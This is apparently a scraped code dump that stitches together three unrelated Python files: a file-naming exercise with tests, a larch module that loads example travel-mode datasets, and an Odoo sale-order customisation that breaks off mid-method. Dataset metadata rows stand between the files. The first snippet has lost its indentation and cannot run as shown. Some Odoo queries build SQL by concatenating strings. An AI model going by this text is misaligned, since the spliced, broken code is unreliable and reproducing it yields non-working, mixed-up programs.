def fileNaming(names):
valid = []
tmp = dict()
for name in names:
if name not in tmp:
valid.append(name)
tmp[name] = True
else:
# That file name has been used
k = 1
new = name
while new in tmp:
new = name + '(' + str(k) + ')'
k += 1
valid.append(new)
tmp[new] = True
return valid
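# Example (mirrors the first test case in main below): colliding names get a
# "(k)" suffix, and generated names are themselves reserved:
#   fileNaming(["doc", "doc", "image", "doc(1)", "doc"])
#     -> ["doc", "doc(1)", "image", "doc(1)(1)", "doc(2)"]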
def main():
tests = [
[
["doc", "doc", "image", "doc(1)", "doc"],
["doc", "doc(1)", "image", "doc(1)(1)", "doc(2)"]
],
[
["a(1)", "a(6)", "a", "a", "a", "a", "a", "a", "a", "a", "a", "a"],
["a(1)", "a(6)", "a", "a(2)", "a(3)", "a(4)", "a(5)", "a(7)",
"a(8)", "a(9)", "a(10)", "a(11)"]
],
[
["dd", "dd(1)", "dd(2)", "dd", "dd(1)", "dd(1)(2)", "dd(1)(1)",
"dd", "dd(1)"],
["dd", "dd(1)", "dd(2)", "dd(3)", "dd(1)(1)", "dd(1)(2)",
"dd(1)(1)(1)", "dd(4)", "dd(1)(3)"]
]
]
for t in tests:
res = fileNaming(t[0])
ans = t[1]
if ans == res:
print("PASSED: fileNaming({}) returned {}"
.format(t[0], res))
else:
print("FAILED: fileNaming({}) returned {}, answer: {}"
.format(t[0], res, ans))
if __name__ == '__main__':
main()
| mit | -816,034,966,986,424,000 | 26.054545 | 79 | 0.348118 | false | 3.04918 | false | false | false |
jpn--/larch | larch/data_services/examples.py | 1 | 3855 | import os
import tables as tb
import pandas as pd
def MTC():
from larch.dataframes import DataFrames
from larch.data_warehouse import example_file
ca = pd.read_csv(example_file('MTCwork.csv.gz'), index_col=('casenum', 'altnum'))
ca['altnum'] = ca.index.get_level_values('altnum')
dt = DataFrames(
ca,
ch="chose",
crack=True,
alt_codes=[1, 2, 3, 4, 5, 6],
alt_names=['DA', 'SR2', 'SR3', 'TRANSIT', 'BIKE', 'WALK']
)
dt.data_ce_as_ca("_avail_")
return dt
# from .service import DataService
# from .h5 import H5PodCA, H5PodCO
# warehouse_file = os.path.join( os.path.dirname(__file__), '..', 'data_warehouse', 'MTCwork.h5d')
# f = tb.open_file(warehouse_file, mode='r')
# idca = H5PodCA(f.root.larch.idca)
# idco = H5PodCO(f.root.larch.idco)
# return DataService(pods=[idca,idco], altids=[1,2,3,4,5,6], altnames=['DA','SR2','SR3','TRANSIT','BIKE','WALK'])
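# Minimal usage sketch (assumes the bundled example data ships with the package):
#   dt = MTC()   # a larch DataFrames holding idca data for the 6 MTC travel modes
#   # dt can then be attached to a larch Model for estimation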
def EXAMPVILLE(model=None):
from ..util import Dict
evil = Dict()
from .service import DataService
import numpy
from .h5 import H5PodCA, H5PodCO, H5PodRC, H5PodCS
from ..omx import OMX
warehouse_dir = os.path.join( os.path.dirname(__file__), '..', 'data_warehouse', )
evil.skims = OMX(os.path.join(warehouse_dir,'exampville.omx'), mode='r')
evil.tours = H5PodCO(os.path.join(warehouse_dir,'exampville_tours.h5'), mode='r', ident='tours')
# hhs = H5PodCO(os.path.join(warehouse_dir,'exampville_hh.h5'))
# persons = H5PodCO(os.path.join(warehouse_dir,'exampville_person.h5'))
# tours.merge_external_data(hhs, 'HHID', )
# tours.merge_external_data(persons, 'PERSONID', )
# tours.add_expression("HOMETAZi", "HOMETAZ-1", dtype=int)
# tours.add_expression("DTAZi", "DTAZ-1", dtype=int)
evil.skims_rc = H5PodRC(evil.tours.HOMETAZi[:], evil.tours.DTAZi[:], groupnode=evil.skims.data, ident='skims_rc')
evil.tours_stack = H5PodCS([evil.tours, evil.skims_rc], storage=evil.tours, ident='tours_stack_by_mode').set_alts([1,2,3,4,5])
DA = 1
SR = 2
Walk = 3
Bike = 4
Transit = 5
# tours_stack.set_bunch('choices', {
# DA: 'TOURMODE==1',
# SR: 'TOURMODE==2',
# Walk: 'TOURMODE==3',
# Bike: 'TOURMODE==4',
# Transit: 'TOURMODE==5',
# })
#
# tours_stack.set_bunch('availability', {
# DA: '(AGE>=16)',
# SR: '1',
# Walk: 'DIST<=3',
# Bike: 'DIST<=15',
# Transit: 'RAIL_TIME>0',
# })
evil.mode_ids = [DA, SR, Walk, Bike, Transit]
evil.mode_names = ['DA', 'SR', 'Walk', 'Bike', 'Transit']
nZones = 15
evil.dest_ids = numpy.arange(1,nZones+1)
evil.logsums = H5PodCA(os.path.join(warehouse_dir,'exampville_mc_logsums.h5'), mode='r', ident='logsums')
return evil
def SWISSMETRO():
from ..util.temporaryfile import TemporaryGzipInflation
warehouse_dir = os.path.join( os.path.dirname(__file__), '..', 'data_warehouse', )
from .service import DataService
from .h5 import H5PodCO, H5PodCS
warehouse_file = TemporaryGzipInflation(os.path.join(warehouse_dir, "swissmetro.h5.gz"))
f = tb.open_file(warehouse_file, mode='r')
idco = H5PodCO(f.root.larch.idco)
stack = H5PodCS(
[idco], ident='stack_by_mode', alts=[1,2,3],
traveltime={1: "TRAIN_TT", 2: "SM_TT", 3: "CAR_TT"},
cost={1: "TRAIN_CO*(GA==0)", 2: "SM_CO*(GA==0)", 3: "CAR_CO"},
avail={1:'TRAIN_AV*(SP!=0)', 2:'SM_AV', 3:'CAR_AV*(SP!=0)'},
choice={1: "CHOICE==1", 2: "CHOICE==2", 3: "CHOICE==3"},
)
return DataService(pods=[idco, stack], altids=[1,2,3], altnames=['Train', 'SM', 'Car'])
def ITINERARY_RAW():
warehouse_file = os.path.join( os.path.dirname(__file__), '..', 'data_warehouse', 'itinerary_data.csv.gz')
import pandas
return pandas.read_csv(warehouse_file)
def example_file(filename):
warehouse_file = os.path.normpath( os.path.join( os.path.dirname(__file__), '..', 'data_warehouse', filename) )
if os.path.exists(warehouse_file):
return warehouse_file
raise FileNotFoundError(f"there is no example data file '{warehouse_file}' in data_warehouse")
| gpl-3.0 | 2,696,184,256,727,657,500 | 37.168317 | 127 | 0.659663 | false | 2.378162 | false | false | false |
trabacus-softapps/docker-magicecommerce | additional_addons/magicemart/m8_sale.py | 1 | 45772 | # -*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
from datetime import datetime, timedelta
import time
from openerp.tools.translate import _
import openerp.addons.decimal_precision as dp
import amount_to_text_softapps
from lxml import etree
from openerp.osv.orm import setup_modifiers
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT
class sale_order(osv.osv):
_inherit = 'sale.order'
    # The Many2one "open record" arrow should not be shown to Customer Portal Users and Managers
def fields_view_get(self, cr, uid, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
user = self.pool.get('res.users').browse(cr,uid,uid)
if context is None:
context = {}
res = super(sale_order, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar,submenu=False)
doc = etree.XML(res['arch'])
cr.execute("""select uid from res_groups_users_rel where gid in
(select id from res_groups where category_id in
( select id from ir_module_category where name = 'Customer Portal' ) and name in ('User','Manager')) and uid = """+str(uid))
portal_user = cr.fetchone()
if portal_user:
if ('fields' in res) and (res['fields'].get('order_line'))\
and (res['fields']['order_line'].get('views'))\
and (res['fields']['order_line']['views'].get('tree'))\
and (res['fields']['order_line']['views']['tree'].get('arch')):
# doc = etree.XML(res['fields']['order_line']['views']['tree']['arch'])
# print 'doc',res['fields']['order_line']['views']['tree']['arch']
doc1 = etree.XML(res['fields']['order_line']['views']['tree']['arch'])
for node in doc1.xpath("//field[@name='price_unit']"):
node.set('readonly', '1')
setup_modifiers(node, res['fields']['order_line'])
res['fields']['order_line']['views']['tree']['arch'] = etree.tostring(doc1)
for node in doc1.xpath("//field[@name='tax_id']"):
node.set('readonly', '1')
setup_modifiers(node, res['fields']['order_line'])
res['fields']['order_line']['views']['tree']['arch'] = etree.tostring(doc1)
#
# if portal_user:
if view_type == 'form':
domain = "[('id','child_of',"+str(user.partner_id.id)+")]"
for node in doc.xpath("//field[@name='pricelist_id']"):
node.set('options', '{"no_open":True}')
node.set('readonly','1')
setup_modifiers(node,res['fields']['pricelist_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='partner_id']"):
node.set('options', "{'no_open' : true}")
node.set('options', "{'no_create' : true}")
node.set('domain', domain )
setup_modifiers(node, res['fields']['partner_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='contact_id']"):
node.set('options', "{'no_open' : true}")
setup_modifiers(node, res['fields']['contact_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='partner_invoice_id']"):
node.set('options', "{'no_open' : true}")
node.set('domain', domain )
setup_modifiers(node, res['fields']['partner_invoice_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='partner_shipping_id']"):
node.set('options', "{'no_open' : true}")
node.set('domain', domain )
setup_modifiers(node, res['fields']['partner_shipping_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='warehouse_id']"):
node.set('options', "{'no_open' : true}")
setup_modifiers(node, res['fields']['warehouse_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='payment_term']"):
node.set('options', "{'no_open' : true}")
setup_modifiers(node, res['fields']['payment_term'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='date_order']"):
node.set('readonly', "1")
setup_modifiers(node, res['fields']['date_order'])
res['arch'] = etree.tostring(doc)
return res
def _get_default_warehouse(self, cr, uid, context=None):
if not context:
context = {}
company_id = self.pool.get('res.users')._get_company(cr, context.get('uid',uid), context=context)
warehouse_ids = self.pool.get('stock.warehouse').search(cr, uid, [('company_id', '=', company_id)], context=context)
if not warehouse_ids:
return False
return warehouse_ids[0]
def default_get(self, cr, uid, fields, context=None):
res = super(sale_order,self).default_get(cr, uid, fields, context)
user = self.pool.get('res.users').browse(cr, uid, uid)
cr.execute("""select uid from res_groups_users_rel where gid=
(select id from res_groups where category_id in
( select id from ir_module_category where name = 'Customer Portal' ) and name = 'Manager') and uid = """+str(uid))
portal_user = cr.fetchone()
portal_group = portal_user and portal_user[0]
if uid == portal_group:
res['partner_id'] = user.partner_id.id
res.update({'order_policy': 'picking'})
return res
def _get_portal(self, cr, uid, ids, fields, args, context=None):
res = {}
cr.execute("""select uid from res_groups_users_rel where gid=
(select id from res_groups where category_id in
( select id from ir_module_category where name = 'Customer Portal' ) and name = 'Manager') and uid = """+str(uid))
portal_user = cr.fetchone()
portal_group = portal_user and portal_user[0]
for case in self.browse(cr, uid, ids):
res[case.id] = {'lock_it': False}
lock_flag = False
if case.state not in ('sent', 'draft'):
lock_flag = True
if uid == portal_group:
if case.state in ('sent', 'draft') and case.sent_portal:
lock_flag = True
res[case.id]= lock_flag
return res
def _get_order(self, cr, uid, ids, context=None):
result = {}
for line in self.pool.get('sale.order.line').browse(cr, uid, ids, context=context):
result[line.order_id.id] = True
return result.keys()
    # Overridden: discount is not taken into account for tax (the discount term is removed in this function)
def _amount_line_tax(self, cr, uid, line, context=None):
val = 0.0
for c in self.pool.get('account.tax').compute_all(cr, uid, line.tax_id, line.price_unit, line.product_uom_qty, line.product_id, line.order_id.partner_id)['taxes']:
val += c.get('amount', 0.0)
return val
def _amount_all(self, cr, uid, ids, field_name, arg, context=None):
cur_obj = self.pool.get('res.currency')
res = {}
for order in self.browse(cr, uid, ids, context=context):
res[order.id] = {
'amount_untaxed': 0.0,
'amount_tax': 0.0,
'amount_total': 0.0,
}
val = val1 = 0.0
cur = order.pricelist_id.currency_id
for line in order.order_line:
val1 += line.price_subtotal
val += self._amount_line_tax(cr, uid, line, context=context)
res[order.id]['amount_tax'] = cur_obj.round(cr, uid, cur, val)
res[order.id]['amount_untaxed'] = cur_obj.round(cr, uid, cur, val1)
res[order.id]['amount_total'] = round(res[order.id]['amount_untaxed'] + res[order.id]['amount_tax'])
return res
    # Function to convert the total amount into words
def _amt_in_words(self, cr, uid, ids, field_name, args, context=None):
res={}
for case in self.browse(cr, uid, ids):
txt=''
if case.amount_total:
txt += amount_to_text_softapps._100000000_to_text(int(round(case.amount_total)))
res[case.id] = txt
return res
_columns ={
'order_policy': fields.selection([
('manual', 'On Demand'),
('picking', 'On Delivery Order'),
('prepaid', 'Before Delivery'),
], 'Create Invoice', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]},
help="""On demand: A draft invoice can be created from the sales order when needed. \nOn delivery order: A draft invoice can be created from the delivery order when the products have been delivered. \nBefore delivery: A draft invoice is created from the sales order and must be paid before the products can be delivered."""),
'contact_id' : fields.many2one('res.partner','Contact Person'),
#inherited
'amount_untaxed': fields.function(_amount_all, digits_compute=dp.get_precision('Account'), string='Untaxed Amount',
store={
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 10),
'sale.order.line': (_get_order, ['price_unit', 'tax_id', 'discount', 'product_uom_qty','order_id'], 20),
},
multi='sums', help="The amount without tax.", track_visibility='always'),
'amount_tax': fields.function(_amount_all, digits_compute=dp.get_precision('Account'), string='Taxes',
store={
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 10),
'sale.order.line': (_get_order, ['price_unit', 'tax_id', 'discount', 'product_uom_qty','order_id'], 20),
},
multi='sums', help="The tax amount."),
'amount_total': fields.function(_amount_all, digits_compute=dp.get_precision('Account'), string='Total',
store={
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 10),
'sale.order.line': (_get_order, ['price_unit', 'tax_id', 'discount', 'product_uom_qty','order_id'], 20),
},
multi='sums', help="The total amount."),
'amt_in_words' : fields.function(_amt_in_words, method=True, string="Amount in Words", type="text",
store={
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 10),
'sale.order.line': (_get_order, ['price_unit', 'tax_id', 'discount', 'product_uom_qty','order_id'], 20),
},
help="Amount in Words.", track_visibility='always'),
'date_from' : fields.function(lambda *a,**k:{}, method=True, type='date',string="From"),
'date_to' : fields.function(lambda *a,**k:{}, method=True, type='date',string="To"),
'terms' : fields.text("Terms And Condition"),
'lock_it' : fields.function(_get_portal, type='boolean', string='Lock it'),
'sent_portal' : fields.boolean('Qtn Sent by Portal'),
'warehouse_id': fields.many2one('stock.warehouse', 'Warehouse', required=True),
# Overriden for old Records
# 'name': fields.char('Order Reference', required=True, copy=False,
# readonly=False, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, select=True),
#
# 'do_name' : fields.char("Delivery Order No", size=25),
}
_defaults = {
'order_policy': 'picking',
'sent_portal': False,
'warehouse_id':_get_default_warehouse
}
    # Duplicates the sale order (used by the re-order button).
def reorder(self, cr, uid, ids, context=None):
context = context or {}
print "YES"
res = self.copy(cr, uid, ids[0], {}, context)
view_ref = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'sale', 'view_order_form')
view_id = view_ref and view_ref[1] or False,
return {
'type': 'ir.actions.act_window',
'name': _('Sales Order'),
'res_model': 'sale.order',
'res_id': res,
'view_type': 'form',
'view_mode': 'form',
'view_id': view_id,
'target': 'current',
'nodestroy': True,
}
def _prepare_invoice(self, cr, uid, order, lines, context=None):
stock_obj = self.pool.get("stock.picking.out")
invoice_vals = super(sale_order,self)._prepare_invoice(cr, uid, order, lines, context)
pick_ids = stock_obj.search(cr, uid,[('sale_id','=',order.id)])
for pick in stock_obj.browse(cr, uid, pick_ids):
invoice_vals.update({
'transport' : pick.cust_po_ref or '',
'vehicle' : pick.vehicle or '',
'dc_ref' : pick.name or '',
})
return invoice_vals
    # On selecting a customer, populate the contact person and pricelist
def onchange_partner_id(self, cr, uid, ids, part, context=None):
if not context:
context = {}
partner_obj = self.pool.get("res.partner")
partner_vals = super(sale_order,self).onchange_partner_id(cr, uid, ids, part, context=context)
if part:
partner = partner_obj.browse(cr, uid, part)
cont = partner_obj.search(cr, uid, [('parent_id','=',part)], limit=1)
partner_vals['value'].update({
'contact_id' : cont and cont[0] or False,
'pricelist_id': partner.property_product_pricelist.id
})
return partner_vals
def _prepare_order_picking(self, cr, uid, order, context=None):
res = super(sale_order,self)._prepare_order_picking(cr, uid, order, context)
res.update({
'contact_id' : order.contact_id and order.contact_id.id or False
})
return res
def quotation(self, cr, uid, ids, context=None):
case = self.browse(cr, uid, ids[0])
datas = {
'model': 'sale.order',
'ids': ids,
'form': self.read(cr, uid, ids[0], context=context),
}
return {
'type': 'ir.actions.report.xml',
'report_name': 'Sales Quotation',
'name' : case.name and 'Sales Quotation - ' + case.name or 'Sales Quotation',
'datas': datas,
'nodestroy': True
}
def action_quotation_send(self, cr, uid, ids, context=None):
'''
This function opens a window to compose an email, with the edi sale template message loaded by default
'''
assert len(ids) == 1, 'This option should only be used for a single id at a time.'
ir_model_data = self.pool.get('ir.model.data')
cr.execute("""select uid from res_groups_users_rel where gid=
(select id from res_groups where category_id in
( select id from ir_module_category where name = 'Customer Portal' ) and name = 'Manager') and uid = """+str(uid))
portal_user = cr.fetchone()
portal_group = portal_user and portal_user[0]
if uid == portal_group:
try:
template_id = ir_model_data.get_object_reference(cr, uid, 'magicemart', 'email_template_send_quotation')[1]
except ValueError:
template_id = False
try:
compose_form_id = ir_model_data.get_object_reference(cr, uid, 'mail', 'email_compose_message_wizard_form')[1]
except ValueError:
compose_form_id = False
ctx = dict(context)
ctx.update({
'default_model': 'sale.order',
'default_res_id': ids[0],
'default_use_template': bool(template_id),
'default_template_id': template_id,
'default_composition_mode': 'comment',
'mark_so_as_sent': True
})
else:
try:
template_id = ir_model_data.get_object_reference(cr, uid, 'sale', 'email_template_edi_sale')[1]
except ValueError:
template_id = False
try:
compose_form_id = ir_model_data.get_object_reference(cr, uid, 'mail', 'email_compose_message_wizard_form')[1]
except ValueError:
compose_form_id = False
ctx = dict(context)
ctx.update({
'default_model': 'sale.order',
'default_res_id': ids[0],
'default_use_template': bool(template_id),
'default_template_id': template_id,
'default_composition_mode': 'comment',
'mark_so_as_sent': True
})
return {
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'mail.compose.message',
'views': [(compose_form_id, 'form')],
'view_id': compose_form_id,
'target': 'new',
'context': ctx,
}
def create(self, cr, uid, vals, context = None):
print "sale",uid, context.get("uid")
        print "Sale Context", context
if not context:
context = {}
        print "Create Website Sale Order......", vals
partner_obj = self.pool.get("res.partner")
warehouse_obj = self.pool.get('stock.warehouse')
uid = context.get("uid",uid)
team_id = vals.get('team_id',False)
if team_id !=3:
if vals.get('warehouse_id',False):
warehouse = warehouse_obj.browse(cr, uid, vals.get('warehouse_id'))
#to select sub company shop
if not warehouse.company_id.parent_id:
raise osv.except_osv(_('User Error'), _('You must select sub company sale warehouse !'))
partner_id = vals.get('partner_id',False)
partner = partner_obj.browse(cr, uid, partner_id)
vals.update({
# 'pricelist_id':partner.property_product_pricelist.id,
'company_id':warehouse.company_id.id,
})
return super(sale_order, self).create(cr, uid, vals, context = context)
def write(self, cr, uid, ids, vals, context = None):
if not context:
context = {}
partner_obj = self.pool.get("res.partner")
warehouse_obj = self.pool.get('stock.warehouse')
if isinstance(ids, (int, long)):
ids = [ids]
if not ids:
return []
case = self.browse(cr, uid, ids[0])
if uid != 1:
if vals.get('warehouse_id',case.warehouse_id.id):
warehouse = warehouse_obj.browse(cr, uid, vals.get('warehouse_id',case.warehouse_id.id))
if not warehouse.company_id.parent_id:
raise osv.except_osv(_('User Error'), _('You must select sub company sale Warehouse !'))
if vals.get('partner_id', case.partner_id):
partner_id = vals.get('partner_id', case.partner_id.id)
partner = partner_obj.browse(cr, uid, partner_id)
vals.update({
# 'pricelist_id':partner.property_product_pricelist.id,
'company_id':warehouse.company_id.id,
})
return super(sale_order, self).write(cr, uid, ids, vals, context = context)
#inherited
def action_button_confirm(self, cr, uid, ids, context=None):
case = self.browse(cr, uid, ids[0])
for ln in case.order_line:
for t in ln.tax_id:
if t.company_id.id != case.company_id.id :
raise osv.except_osv(_('Configuration Error!'),_('Please define the taxes which is related to the company \n "%s" !')%(case.company_id.name))
return super(sale_order,self).action_button_confirm(cr, uid, ids, context)
# Inheriting action_ship_create Method to update Sale ID in Delivery Order
def action_ship_create(self, cr, uid, ids, context=None):
if not context:
context={}
pick_ids=[]
# context.get('active_ids').sort()
res=super(sale_order, self).action_ship_create(cr, uid, ids,context)
pick=self.pool.get('stock.picking')
for case in self.browse(cr,uid,ids):
pick_ids=pick.search(cr,uid,[('group_id','=',case.procurement_group_id.id)])
pick.write(cr,uid,pick_ids,{
'sale_id' : case.id,
'company_id' : case.company_id.id,
})
return res
#
# def web_comp_tax(self,cr, uid, ids, warehouse_id, company_id, context=None):
# context = dict(context or {})
# print "Wrehouse Sale.........",warehouse_id
# if warehouse_id:
# self.write(cr, uid, ids, {"warehouse_id":warehouse_id,
# 'company_id':company_id,
# })
# return True
sale_order()
class sale_order_line(osv.osv):
_name = 'sale.order.line'
_inherit = 'sale.order.line'
_description = 'Sales Order Line'
def _get_order(self, cr, uid, ids, context=None):
result = {}
for line in self.pool.get('sale.order.line').browse(cr, uid, ids, context=context):
result[line.order_id.id] = True
return result.keys()
def _get_price_reduce(self, cr, uid, ids, field_name, arg, context=None):
res = dict.fromkeys(ids, 0.0)
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = line.price_subtotal / line.product_uom_qty
return res
def _amount_line(self, cr, uid, ids, field_name, arg, context=None):
tax_obj = self.pool.get('account.tax')
cur_obj = self.pool.get('res.currency')
res = {}
if context is None:
context = {}
if context.get("uid"):
if uid != context.get("uid",False):
uid = context.get("uid")
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = {'price_total':0.0,'price_subtotal':0.0}
price = line.price_unit #* (1 - (line.discount or 0.0) / 100.0)
taxes = tax_obj.compute_all(cr, uid, line.tax_id, price, line.product_uom_qty, line.product_id, line.order_id.partner_id)
# print "Taxes......", taxes
cur = line.order_id.pricelist_id.currency_id
res[line.id]['price_subtotal'] = cur_obj.round(cr, uid, cur, taxes['total'])
# for price total
amount = taxes['total']
for t in taxes.get('taxes',False):
amount += t['amount']
res[line.id]['price_total'] = cur_obj.round(cr, uid, cur, amount)
return res
    # Overridden to remove the discount calculation (the discount is already included in the unit price)
def _product_margin(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = 0
if line.product_id:
if line.purchase_price:
res[line.id] = round((line.price_unit*line.product_uos_qty ) -(line.purchase_price*line.product_uos_qty), 2)
else:
res[line.id] = round((line.price_unit*line.product_uos_qty ) -(line.product_id.standard_price*line.product_uos_qty), 2)
return res
_columns = {
'price_total' : fields.function(_amount_line, string='Subtotal1', digits_compute= dp.get_precision('Account'), store=True, multi="all"),
'price_subtotal': fields.function(_amount_line, string='Subtotal', digits_compute= dp.get_precision('Account'), multi="all",store=True),
'reference' : fields.char("Reference(BOP)", size=20),
# 'mrp' : fields.related('product_id','list_price', type="float", string="MRP", store=True),
# 'available_qty' : fields.related('product_id','qty_available', type="float", string="Available Quantity", store=True ),
'product_image' : fields.binary('Image'),
'sale_mrp' : fields.float('MRP', digits=(16,2)),
'available_qty' : fields.integer("Available Quantity"),
        # Overridden to remove the discount calculation (the discount is already included in the unit price)
'margin': fields.function(_product_margin, string='Margin',
store = True),
'price_reduce': fields.function(_get_price_reduce, type='float', string='Price Reduce', digits_compute=dp.get_precision('Product Price')),
}
_order = 'id asc'
def _prepare_order_line_invoice_line(self, cr, uid, line, account_id=False, context=None):
res = super(sale_order_line,self)._prepare_order_line_invoice_line(cr, uid, line, account_id, context=context)
if res:
res.update({'reference': line.reference})
return res
# Overriden
def product_id_change(self, cr, uid, ids, pricelist, product, qty=0,
uom=False, qty_uos=0, uos=False, name='', partner_id=False,
lang=False, update_tax=True, date_order=False, packaging=False, fiscal_position=False, flag=False, context=None):
context = context or {}
part_obj = self.pool.get("res.partner")
if context.get("uid"):
if context and uid != context.get("uid",False):
uid = context.get("uid")
user_obj = self.pool.get("res.users")
user = user_obj.browse(cr, uid, [context.get("uid",uid)])
partner = part_obj.browse(cr, uid, [user.partner_id.id])
partner_id = partner.id
lang = lang or context.get('lang', False)
if not partner_id:
raise osv.except_osv(_('No Customer Defined!'), _('Before choosing a product,\n select a customer in the sales form.'))
warning = False
product_uom_obj = self.pool.get('product.uom')
partner_obj = self.pool.get('res.partner')
product_obj = self.pool.get('product.product')
context = {'lang': lang, 'partner_id': partner_id}
partner = partner_obj.browse(cr, uid, partner_id)
lang = partner.lang
# lang = context.get("lang",False)
context_partner = {'lang': lang, 'partner_id': partner_id}
if not product:
return {'value': {'th_weight': 0,
'product_uos_qty': qty}, 'domain': {'product_uom': [],
'product_uos': []}}
if not date_order:
date_order = time.strftime(DEFAULT_SERVER_DATE_FORMAT)
result = {}
warning_msgs = ''
product_obj = product_obj.browse(cr, uid, product, context=context_partner)
uom2 = False
if uom:
uom2 = product_uom_obj.browse(cr, uid, uom)
if product_obj.uom_id.category_id.id != uom2.category_id.id:
uom = False
if uos:
if product_obj.uos_id:
uos2 = product_uom_obj.browse(cr, uid, uos)
if product_obj.uos_id.category_id.id != uos2.category_id.id:
uos = False
else:
uos = False
fpos = False
if not fiscal_position:
fpos = partner.property_account_position or False
else:
fpos = self.pool.get('account.fiscal.position').browse(cr, uid, fiscal_position)
if update_tax: #The quantity only have changed
result['tax_id'] = self.pool.get('account.fiscal.position').map_tax(cr, uid, fpos, product_obj.taxes_id)
if not flag:
result['name'] = self.pool.get('product.product').name_get(cr, uid, [product_obj.id], context=context_partner)[0][1]
if product_obj.description_sale:
result['name'] += '\n'+product_obj.description_sale
domain = {}
if (not uom) and (not uos):
result['product_uom'] = product_obj.uom_id.id
if product_obj.uos_id:
result['product_uos'] = product_obj.uos_id.id
result['product_uos_qty'] = qty * product_obj.uos_coeff
uos_category_id = product_obj.uos_id.category_id.id
else:
result['product_uos'] = False
result['product_uos_qty'] = qty
uos_category_id = False
result['th_weight'] = qty * product_obj.weight
domain = {'product_uom':
[('category_id', '=', product_obj.uom_id.category_id.id)],
'product_uos':
[('category_id', '=', uos_category_id)]}
elif uos and not uom: # only happens if uom is False
result['product_uom'] = product_obj.uom_id and product_obj.uom_id.id
result['product_uom_qty'] = qty_uos / product_obj.uos_coeff
result['th_weight'] = result['product_uom_qty'] * product_obj.weight
elif uom: # whether uos is set or not
default_uom = product_obj.uom_id and product_obj.uom_id.id
q = product_uom_obj._compute_qty(cr, uid, uom, qty, default_uom)
if product_obj.uos_id:
result['product_uos'] = product_obj.uos_id.id
result['product_uos_qty'] = qty * product_obj.uos_coeff
else:
result['product_uos'] = False
result['product_uos_qty'] = qty
result['th_weight'] = q * product_obj.weight # Round the quantity up
if not uom2:
uom2 = product_obj.uom_id
# get unit price
if not pricelist:
warn_msg = _('You have to select a pricelist or a customer in the sales form !\n'
'Please set one before choosing a product.')
warning_msgs += _("No Pricelist ! : ") + warn_msg +"\n\n"
else:
price = self.pool.get('product.pricelist').price_get(cr, uid, [pricelist],
product, qty or 1.0, partner_id, {
'uom': uom or result.get('product_uom'),
'date': date_order,
})[pricelist]
if price is False:
warn_msg = _("Cannot find a pricelist line matching this product and quantity.\n"
"You have to change either the product, the quantity or the pricelist.")
warning_msgs += _("No valid pricelist line found ! :") + warn_msg +"\n\n"
else:
result.update({'price_unit': price})
if warning_msgs:
warning = {
'title': _('Configuration Error!'),
'message' : warning_msgs
}
return {'value': result, 'domain': domain, 'warning': warning}
#inherited
def product_id_change_with_wh(self, cr, uid, ids, pricelist, product, qty=0,
uom=False, qty_uos=0, uos=False, name='', partner_id=False,
lang=False, update_tax=True, date_order=False, packaging=False, fiscal_position=False, flag=False, warehouse_id=False, context=None):
if not context:
context= {}
context = dict(context)
case = self.browse(cr, uid, ids)
uom = case.product_uom and case.product_uom.id or False
res = super(sale_order_line,self).product_id_change_with_wh(cr, uid, ids, pricelist, product, qty, uom, qty_uos, uos, name, partner_id, lang, update_tax, date_order, packaging, fiscal_position, flag, warehouse_id,context)
        # if the product changes and the product is not in the pricelist, fall back to the sales price
location_ids =[]
unit_amt = 0.00
move_obj = self.pool.get("stock.move")
loc_obj = self.pool.get("stock.location")
prod_obj =self.pool.get("product.product")
prod = prod_obj.browse(cr, uid,product)
pricelist_obj = self.pool.get("product.pricelist")
warehouse_obj = self.pool.get("stock.warehouse")
pricelist_id = pricelist_obj.browse(cr, uid, pricelist)
if warehouse_id: # shop is nothing but company_id
context.update({'warehouse':warehouse_id})
warehouse = warehouse_obj.browse(cr, uid, warehouse_id)
res['value']['company_id'] = warehouse.company_id.id
# warehouse_id = context.get('warehouse_id')
# warehouse = self.pool.get("stock.warehouse").browse(cr, uid, warehouse_id)
# comp_id = warehouse.company_id.id
# location_ids = loc_obj.search(cr, uid,[('company_id','=',comp_id ),('name','=','Stock')])
# if location_ids:
# location_ids = location_ids[0]
if product:
available_qty = prod_obj._product_available(cr, uid, [product], None, False, context)
available_qty = available_qty[product].get('qty_available',0)
# Commented for Pricelist Concept
if pricelist_id.name == 'Public Pricelist' or not res['value'].get('price_unit'):
unit_amt = prod.discount and prod.list_price - ((prod.discount/100) * prod.list_price) or prod.list_price
res['value']['discount'] = prod.discount
if not res['value'].get('price_unit') and product:
res['value']['price_unit'] = unit_amt and unit_amt or prod.list_price
warn_msg = _('No Product in The Current Pricelist, It Will Pick The Sales Price')
                warning_msgs = _("No Pricelist ! : ") + warn_msg + "\n\n"
res['warning'] = {
'title': _('Configuration Error!'),
'message' : warning_msgs
}
if product:
res['value']['sale_mrp'] = prod.list_price
res['value']['product_image'] = prod.image_medium
res['value']['available_qty'] = available_qty
res['value']['purchase_price'] = prod.standard_price or 0.00
# Commented for Pricelist Concept
if unit_amt :
res['value']['price_unit'] = unit_amt
return res
def create(self, cr, uid, vals, context=None):
if not context:
